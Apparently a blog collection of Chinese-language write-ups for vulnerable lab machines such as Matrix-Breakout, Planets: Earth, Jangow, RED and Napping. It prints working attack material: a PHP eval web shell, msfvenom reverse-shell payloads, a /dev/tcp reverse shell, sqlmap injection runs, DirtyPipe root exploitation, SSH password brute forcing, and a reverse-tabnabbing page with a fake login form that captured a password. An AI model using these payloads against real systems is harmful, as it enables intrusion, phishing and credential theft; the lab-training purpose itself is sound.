唉,ctf小子。还是学学渗透吧

MATRIX-BREAKOUT: 2 MORPHEUS

老规矩nmap扫网

nmap 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 01:23 EST
Nmap scan report for 192.168.2.1
Host is up (0.00047s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql

Nmap scan report for 192.168.2.2
Host is up (0.00063s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
53/tcp open  domain

Nmap scan report for 192.168.2.128
Host is up (0.00053s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap scan report for 192.168.2.130
Host is up (0.00018s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
81/tcp open  hosts2-ns

Nmap done: 256 IP addresses (4 hosts up) scanned in 7.15 seconds

可以见得靶机192.168.2.130,往下扫

sudo nmap -p22,80,81 -sV -O 192.168.2.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 01:24 EST
Nmap scan report for 192.168.2.130
Host is up (0.00014s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
81/tcp open  http    nginx 1.18.0
MAC Address: 00:0C:29:6D:19:5E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.5 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.73 seconds

80进去没东西,22考虑ssh爆破,81要求身份验证

80扫目录,dirsearch的字典太小了,扫不出来东西,得换dirbuster的字典

gobuster dir -u http://192.168.2.130 -t 40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

image-20240306154006655

实测.php能向文件中插入语句,可以打xss,但是xss没什么卵用

写shell进页面中

file=index.php&message=<?php eval($_POST['shell']);?>

直接蚁剑连,根目录有FLAG1

直接起msf后渗透

msfvenom生成php马

msf6 > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.2.128 LPORT=4444 -f raw > shell.php
[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.2.128 LPORT=4444 -f raw > shell.php

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34852 bytes

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.2.128
LHOST => 192.168.2.128
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.2.128:4444 

然后把刚刚生成的php马通过蚁剑丢到靶机里

php shell.php

就反弹到msf上了

image-20240306161402965

然后看看怎么提权,常见的就是suid内核crontab

image-20240306162800603

image-20240306162811978

image-20240306162853554

这里的linux 5.10是存在内核提权洞

CVE-2022-0847:Linux DirtyPipe内核提权漏洞

如果搜不出来也可以用linpeas.sh脚本扫一下

image-20240306163359403

直接切到后台搜一下dirtypipe的payload

image-20240306163637920

image-20240306163801863

拿到root,进/root拿到最后一个flag

Web-Machine-N7

namp只扫出来个80

gobuster dir -u http://192.168.4.3/ -t 40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

扫出来exploit.html路径,进去是个上传点

传文件发现写死的路径是http://localhost/profile.php,改成http://targetip/profile.php重传,有上半部分flag

image-20240310112842193

用正常字典都扫不出来一个enter_network目录,难绷

进去是个登录界面,sqlmap直接跑

sqlmap -r sql.txt -p user,pass
sqlmap -r sql.txt -p user --dbms mysql --level 3 --dbs
sqlmap -r sql.txt -p user --dbms mysql --level 3 -D Machine --tables
sqlmap -r sql.txt -p user --dbms mysql --level 3 -D Machine -T login --columns
sqlmap -r sql.txt -p user --dbms mysql --level 3 -D Machine -T login -C "username,password,role" --dump

image-20240310123018042

最后翻了很久也没进内网,一看网上好像就没法进😅什么b题

enter_network目录也是幽默的一b,里面还有个/admin.php页面,正常带cookie都没用

image-20240310123251003

解出来是admin,但是只要改成role=admin就能弹下半部分flag,甚至不需要user字段,你们有没有这么幽默的题啊,真是幽幽又默默啊

image-20240310123423296

The Planets: Earth

nmap扫网

sudo nmap -sV -sC -p- 192.168.2.131 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 09:03 EST
Nmap scan report for 192.168.2.131
Host is up (0.00019s latency).
Not shown: 65378 filtered tcp ports (no-response), 154 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| tls-alpn: 
|_  http/1.1
|_http-title: Test Page for the HTTP Server on Fedora
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Potentially risky methods: TRACE
MAC Address: 00:0C:29:9C:1D:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.57 seconds
    

进网页咋一看没什么东西

80显示400,443给的是Fedora默认页。但是扫描信息给出了点信息

DNS:earth.local, DNS:terratest.earth.local

加入hosts文件再次访问

image-20240306220951214

当传入message和key时,会往页面中写入Previous Messages

message	key	PreviousMessages
1		1	00
2		1	03
3		1	02

同时扫网

image-20240306223106938

image-20240306223115997

一个是http,一个是https,有点区别(不知道为什么gobuster扫不出来robots.txt

robots.txt文件

image-20240306223236887

测试后发现后缀是txt文件

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

有三点提示,使用异或作为加密testdata.txt用来测试加密terra作为admin的用户名

访问\testdata.txt获得

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

使用CyberChef解密

PreviousMessages -hex2utf8> xor -key> earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

猜测earthclimatechangebad4human为密码

进入后台能执行命令

image-20240306224048689

进入一个python环境,尝试反弹一个shell,这里有个点就是没法用10进制反弹,得转换成16进制

sh -i >& /dev/tcp/3232236160/7890 0>&1

image-20240306224705436

生成马

image-20240306225252954

image-20240306225304725

同时靶机进入/tmp把刚刚生成的wget下来执行

image-20240306225345986

这里如果不set payload就会直接断连

image-20240306225655392

set payload linux/x86/meterpreter/reverse_tcp

然后重新执行./payload.elf就能反弹回来了

还是一样看一下怎么提权

直接试一下提权脚本,还有DirtyPipe

image-20240307111916125

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  3         meterpreter x86/linux  apache @ 192.168.2.131  192.168.2.128:4444 -> 192.168.2.131:52144 (192.168.2.131)

msf6 exploit(multi/handler) > search DirtyPipe

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/local/cve_2022_0847_dirtypipe  2022-02-20       excellent  Yes    Dirty Pipe Local Privilege Escalation via CVE-2022-0847


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/cve_2022_0847_dirtypipe

msf6 exploit(multi/handler) > use 0
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > show options

Module options (exploit/linux/local/cve_2022_0847_dirtypipe):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   COMPILE           Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                            yes       The session to run this module on
   SUID_BINARY_PATH  /bin/passwd      no        The path to a suid binary
   WRITABLE_DIR      /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set SESSION 3
SESSION => 3
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LHOST 192.168.2.128
LHOST => 192.168.2.128
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 192.168.2.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.14.9
[*] Executing exploit '/tmp/.gcwucmb /bin/passwd'
[*] Sending stage (3045380 bytes) to 192.168.2.131
[+] Deleted /tmp/.gcwucmb
[*] Meterpreter session 4 opened (192.168.2.128:4444 -> 192.168.2.131:52146) at 2024-03-06 22:17:34 -0500

meterpreter > getuid
Server username: root

后面去别的地方看了一下,我这方法还是太没脑子了

find / -name "*flag.txt" 2>/dev/null
/var/earth_web/user_flag.txt

拿到一个flag,同时找一下有没有suid提权

find / -perm -u=s -type f 2>/dev/null

image-20240307113151166

明显有个reset_roots位,利用strings看一下

image-20240307113505250

CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

大意就是重置root密码为Earth,而直接执行又会提示RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

在外部通过msf自带的download把二进制文件下载下来

image-20240307114140839

IDA反编译一个(

def magic_cipher(a1, a2, a3, a4, a5):
    for i in range(0, a4):
        a3[i] = a1[i] ^ a2[i % (a5 - 1)]


v16 = [ord(i) for i in "palebluedot"]
v16.append(0)
v14 = [0x04, 0x09, 0x09, 0x07, 0x0E, 0x19, 0x10, 0x08, 0x05, 0x1D, 0x16, 0x1C, 0x04, 0x5D, 0x5C, 0x55, 0x5E, 0x00]
# v15 = 94

v8 = [0x5B, 0x0C, 0x00, 0x14, 0x43, 0x06, 0x0D, 0x00, 0x4E, 0x19, 0x2A, 0x0B, 0x31, 0x77, 0x70, 0x02, 0x75, 0x00]
# v9 = 117

v6 = [0x5B, 0x0C, 0x00, 0x14, 0x43, 0x06, 0x0D, 0x00, 0x4E, 0x28, 0x15, 0x5B, 0x07, 0x67, 0x00, 0x62, 0x07, 0x00]
# v7 = 7

v4 = [0x5B, 0x1C, 0x08, 0x12, 0x43, 0x1E, 0x06, 0x20, 0x51, 0x25, 0x07, 0x1B, 0x00]
v13 = [0] * 17
name = [0] * 17

magic_cipher(v14, v16, v13, 17, 12)
for i in v13:
    print(chr(i), end="")
print("\n")
magic_cipher(v8, v13, name, 17, 18)
for i in name:
    print(chr(i), end="")
print("\n")
magic_cipher(v6, v13, name, 17, 18)
for i in name:
    print(chr(i), end="")
print("\n")
magic_cipher(v4, v13, name, 13, 18)
for i in name:
    print(chr(i), end="")
print("\n")

image-20240307171919853

要求有下面三个目录才能reset_root

用linux上的strace更快

image-20240307172014110

或者开动调

image-20240307173450017

image-20240307174705167

Jangow: 1.0.1

司马东西,用vm还连不上网卡

还是扫网,这次只有8021

Nmap scan report for 192.168.12.3
Host is up (0.0014s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE    VERSION
21/tcp open  ftp        vsftpd 3.0.3
80/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (95%), DD-WRT v24-sp2 (Linux 2.4.37) (95%), D-Link DWL-G810 WAP (93%), Denon AVR-2113 audio receiver (93%), D-Link DI-524 or WBR-2310 wireless broadband router (92%), Linux 3.2 (92%), Linux 4.4 (92%), AXIS 5550 print server (91%), D-Link NetDefend firewall (91%), DEC OpenVMS 7.1 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix

80扫网后没有什么路径暴露,21也不能匿名登录

整个80网站里只有一个传参的地方

image-20240307222121565

尝试后发现可以直接命令执行

image-20240307222147174

创建一个shell用蚁剑连上去,经过测试,发现是不出网的靶机

有一些备份文件

image-20240308131055774

image-20240308131133969

尝试登录数据库无果

image-20240308131343247

探测如何出网,不然shell都不好反弹出去

可以在kali上用iptables进行端口转发,把80-65535的端口全部转发到7890上,然后靶机批量访问kali上的80-65535端口,查看对哪个端口能出网

sudo iptables -t nat -A PREROUTING -p tcp --dport 80:65535 -j REDIRECT --to-port 7890

在靶机上写个shell批量访问

touch try.txt;
for port in `seq 80 65535`
do
    timeout 0.5 nc -z 192.168.12.4 $port && echo "$port is open" >> try.txt;
done

打出来只有访问外部443能出网

image-20240308192850558

那就只能通过443反连msf,在反弹前记得把iptables的规则关了

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.4 LPORT=443 -f elf -o pay.elf
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.12.4
set LPORT 443
run

然后反弹一个完整shell回来

python3 -c "import pty;pty.spawn('/bin/bash')"

进去找一圈没东西,还是老样子漏扫脚本linpeas.sh

image-20240308203047344

应该是dirtycow的问题,经常一打就崩,换用第一个eBPF_verifier

image-20240308203742009

RED: 1

不会做靶机别做,打两下就崩😅分了10G都能内存溢出,死妈妈了

namp扫网

sudo nmap -p22,80 -sV -O -sC 192.168.4.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 03:21 EDT
Nmap scan report for 192.168.4.5
Host is up (0.00016s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8d:53:65:83:52:52:c4:12:72:49:be:33:5d:d1:e7:1c (RSA)
|   256 06:61:0a:49:86:43:64:ca:b0:0c:0f:09:17:7b:33:ba (ECDSA)
|_  256 9b:8d:90:47:2a:c1:dc:11:28:7d:57:e0:8a:23:b4:69 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hacked By Red &#8211; Your site has been Hacked! You\xE2\x80\x99ll neve...
|_http-generator: WordPress 5.8.1
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

看了一眼链接,全都导到redrocks.win上去了,猜测要改hosts,改后页面正常

直接搜wordpress 5.8,在/wp-admin/admin-ajax.php处是有个sql注入点,而这个路径在robots.txt也是存在的

参考

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

一通注发现啥都没有,哈哈恩

image-20240310181800846

找后门

image-20240310181825737

Mr. Miessler指向github上的一个字典

换字典扫网发现后门路径

gobuster dir -u http://redrocks.win/ -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x html,txt,php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://redrocks.win/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/NetworkFileManagerPHP.php (Status: 500) [Size: 0]
Progress: 1688 / 1692 (99.76%)
===============================================================
Finished
===============================================================

再对/NetworkFileManagerPHP.phpfuzz

wfuzz -Z -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=index.php" --req-delay 1 -t 1

傻逼数据库天天崩,不扫了直接看wp

FUZZ的是key,是个文件包含

image-20240310203635615

先读NetworkFileManagerPHP

<?php
   $file = $_GET['key'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("NetworkFileManagerPHP.php");
   }
   /* VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw== */->That password alone won't help you! Hashcat says rules are rules
?

由于是wordpress的站,还可以看一下wp-config.php的配置文件

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define('FS_METHOD', 'direct');

define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY',  'ah}<I`52GL6C^@

再想include2shell就基本没什么办法了,由于不知道tmp目录,session也没尝试

That password alone won't help you! Hashcat says rules are rules

由于有hashcat的提示和wp-config的密码R3v_m4lwh3r3_k1nG!!,可以推出要利用hashcat的规则进行密码推演

hashcat --stdout raw_pass -r /usr/share/hashcat/rules/rockyou-30000.rule > pass
msfconsole
search ssh_login
set RHOSTS 192.168.4.5
set STOP_ON_SUCCESS true
set USERNAME john
set PASS_FILE pass
set THREADS 50
run

image-20240310223646050

虽然是登进去了,但是一段时间后会自动改密码然后登出,所以需要权限维持

image-20240310223841397

看一眼home目录下的文件

image-20240311122313804

vimcat互换了

image-20240311122438773

可以用空密码以ippsec用户执行time

image-20240311122711502

可以通过timeippsec的用户来反弹一个shell,突破定时登出john的限制

看一眼suid

john@red:/etc/alternatives$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/at
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/mount
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/snap/snapd/13640/usr/lib/snapd/snap-confine
/snap/snapd/12704/usr/lib/snapd/snap-confine
/snap/core18/2246/bin/mount
/snap/core18/2246/bin/ping
/snap/core18/2246/bin/su
/snap/core18/2246/bin/umount
/snap/core18/2246/usr/bin/chfn
/snap/core18/2246/usr/bin/chsh
/snap/core18/2246/usr/bin/gpasswd
/snap/core18/2246/usr/bin/newgrp
/snap/core18/2246/usr/bin/passwd
/snap/core18/2246/usr/bin/sudo
/snap/core18/2246/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2246/usr/lib/openssh/ssh-keysign
/snap/core18/2812/bin/mount
/snap/core18/2812/bin/ping
/snap/core18/2812/bin/su
/snap/core18/2812/bin/umount
/snap/core18/2812/usr/bin/chfn
/snap/core18/2812/usr/bin/chsh
/snap/core18/2812/usr/bin/gpasswd
/snap/core18/2812/usr/bin/newgrp
/snap/core18/2812/usr/bin/passwd
/snap/core18/2812/usr/bin/sudo
/snap/core18/2812/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2812/usr/lib/openssh/ssh-keysign
/snap/core20/2182/usr/bin/chfn
/snap/core20/2182/usr/bin/chsh
/snap/core20/2182/usr/bin/gpasswd
/snap/core20/2182/usr/bin/mount
/snap/core20/2182/usr/bin/newgrp
/snap/core20/2182/usr/bin/passwd
/snap/core20/2182/usr/bin/su
/snap/core20/2182/usr/bin/sudo
/snap/core20/2182/usr/bin/umount
/snap/core20/2182/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2182/usr/lib/openssh/ssh-keysign
/snap/core20/1169/usr/bin/chfn
/snap/core20/1169/usr/bin/chsh
/snap/core20/1169/usr/bin/gpasswd
/snap/core20/1169/usr/bin/mount
/snap/core20/1169/usr/bin/newgrp
/snap/core20/1169/usr/bin/passwd
/snap/core20/1169/usr/bin/su
/snap/core20/1169/usr/bin/sudo
/snap/core20/1169/usr/bin/umount
/snap/core20/1169/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1169/usr/lib/openssh/ssh-keysign

没什么可以用的,想用漏扫脚本,也是因为vimcat互换的原因,不方便操作

搜了一下5.4的内核还不好提权,普通用户也看不到root的定时任务

这里要配合pspy,不需要root就可以监控进程

image-20240311154042578

重点看一下UID=0的进程

可以看到,一直弹出对话的就是/bin/bash /root/defense/talk.sh这个进程

image-20240311154348944

还利用gcc编译了supersecretfileuc.crev,然后执行,一看就是后门,然后change_pass.sh+kill_sess.sh

image-20240311154545422

image-20240311154704449

直接两个文件删了重传一个supersecretfileuc.c等反弹shell就行

image-20240311160505741

这里sh要改成/bin/bash

image-20240311155542547

image-20240311160825464

image-20240311161600599

NAPPING: 1.0.1

扫网

sudo nmap -p22,80 -sV -O -sC 192.168.4.104
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 23:32 EDT
Nmap scan report for 192.168.4.104
Host is up (0.00017s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.93 seconds

80是个登录,sqlmap跑一通没找到能注的

首页提示

Please submit your link so that we can get started. All links will be reviewed by our admin

python起个服务交上去确实会访问上

image-20240312152213452

钓鱼攻击之Reverse Tabnabbing

简而言之就是如果A网页a标签中的的选项设置为target="_blank" rel="opener"(如果未指定rel="opener"则可能可以,指定了rel="noopener"则无),被打开的新标签页B中就有window.opener指针指向A网页。可以利用window.opener的方法修改A网页

如果靶机内部会check,那一定也会使用登录然后进后台,只需要构造evil.html,使得能修改靶机中的index.html劫持登录选项即可

evil.html:
<!DOCTYPE html>
<body>
    <script>
   if (window.opener) {
      window.opener.parent.location.replace('http://192.168.4.103:7890/index.html');
   }else{
   }
  </script>
</body>


index.html:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper">
        <h2>Login</h2>
        <p>Please fill in your credentials to login.</p>

        
        <form action="http://192.168.4.103:7890/index.php" method="post">
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control " value="">
                <span class="invalid-feedback"></span>
            </div>    
            <div class="form-group">
                <label>Password</label>
                <input type="password" name="password" class="form-control ">
                <span class="invalid-feedback"></span>
            </div>
            <div class="form-group">
                <input type="submit" class="btn btn-primary" value="Login">
            </div>
            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
        </form>
    </div>
</body>
</html>

起一个http监测server

python3 Get_HTTP_Info.py 7890
Port: 7890
Serving HTTP on port 7890...
-----Begin of Request From 192.168.4.104 -----
{
    "method": "GET",
    "path": "/evil.html",
    "remote_host": "192.168.4.104",
    "remote_port": 35010,
    "headers": {
        "Host": "192.168.4.103:7890",
        "User-Agent": "python-requests/2.22.0",
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Connection": "keep-alive"
    }
}
-----End of Request-----


-----Begin of Request From 192.168.4.104 -----
{
    "method": "POST",
    "path": "/index.html",
    "remote_host": "192.168.4.104",
    "remote_port": 35012,
    "headers": {
        "Host": "192.168.4.103:7890",
        "User-Agent": "python-requests/2.22.0",
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Connection": "keep-alive",
        "Content-Length": "45",
        "Content-Type": "application/x-www-form-urlencoded"
    }
}
POST Data:
username=daniel&password=C%40ughtm3napping123
-----End of Request-----

可以看到弹回来的POST Data

username=daniel&password=C%40ughtm3napping123C@ughtm3napping123

这个账号虽然登录不了网页,但是能用ssh登

image-20240312204125206

漏扫没扫出东西,先找一下之前check地址的py

image-20240312222605790

from datetime import datetime
import requests

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

image-20240312222747745
